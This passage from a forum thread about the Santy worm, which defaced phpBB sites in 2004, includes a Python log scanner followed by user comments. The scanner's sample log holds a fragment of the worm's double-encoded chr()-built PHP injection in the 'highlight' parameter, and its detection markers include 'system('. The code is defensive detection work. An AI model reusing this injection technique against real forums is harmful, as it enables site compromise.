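    '%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)'
    '%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)'
    '%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)'
    '%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)'
    '%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)'
    '%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)'
    '%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527'
    ' HTTP/1.0" 200 22613 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '198.51.100.9 - - [20/Dec/2004:11:06:02 -0600] "GET /forum/viewtopic.php?t=12'
    '&highlight=santy HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
]

# Request-line and chr(N) patterns (Apache combined log format assumed).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
CHR_RE = re.compile(r'chr\((\d+)\)')

# Assumed indicators of an injected PHP expression in the highlight value.
SANTY_MARKERS = ("system(", "chr(")


def decode_highlight(url_path):
    """Return the highlight parameter after two rounds of URL decoding.

    The worm encodes quotes and dots twice (%2527 -> %27 -> '), so one
    decode, which parse_qs performs, leaves %27/%2e behind; unquote again.
    Returns None when the request has no highlight parameter.
    """
    query = urllib.parse.urlsplit(url_path).query
    params = urllib.parse.parse_qs(query, keep_blank_values=True)
    if "highlight" not in params:
        return None
    return urllib.parse.unquote(params["highlight"][0])


def chr_payload_to_text(expr):
    """Concatenate every chr(N) in a PHP expression into readable text."""
    return "".join(chr(int(n)) for n in CHR_RE.findall(expr))


def flag_requests(lines):
    """Return (client_ip, decoded_text) for log lines whose highlight value
    looks like injected PHP; benign highlight terms are skipped."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        value = decode_highlight(m.group(1))
        if value is None or not any(k in value for k in SANTY_MARKERS):
            continue
        hits.append((line.split()[0], chr_payload_to_text(value)))
    return hits


if __name__ == "__main__":
    for ip, text in flag_requests(SAMPLE_LOG):
        print(f"{ip}: {text}")
```

Running it prints the single flagged line with its reconstructed command, which matches the one falz decoded by hand; the benign `highlight=santy` request is not reported because it contains no PHP call syntax after decoding.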

NeverEverNoSanta (1, Funny)

Anonymous Coward | more than 9 years ago | (#11153612)

"Once Santa infects a Web site, he searches Google for other sites running phpBB and then attempts to infect those sites as well."

And so it comes full circle... (1)

MoeMoe (659154) | more than 9 years ago | (#11153629)

It seems one of the webcomics I read, UnderPower, got affected as well... It also happens to be linked here on Slashdot...

Black background, red lettering:

This site is defaced!!!
NeverEverNoSanity WebWorm generation 14.

MSN actually returns 207 results (3, Informative)

bharatman (253051) | more than 9 years ago | (#11153652)


MSN's first page estimates are always grossly inflated. Try this link instead:

http://beta.search.msn.com/results.aspx?q=NeverEverNoSanity&first=200&count=10&FORM=PERE4

Note that the "first" param is 200 (which is the equivalent of going to page 20). It hits the end of the results and revises its estimate.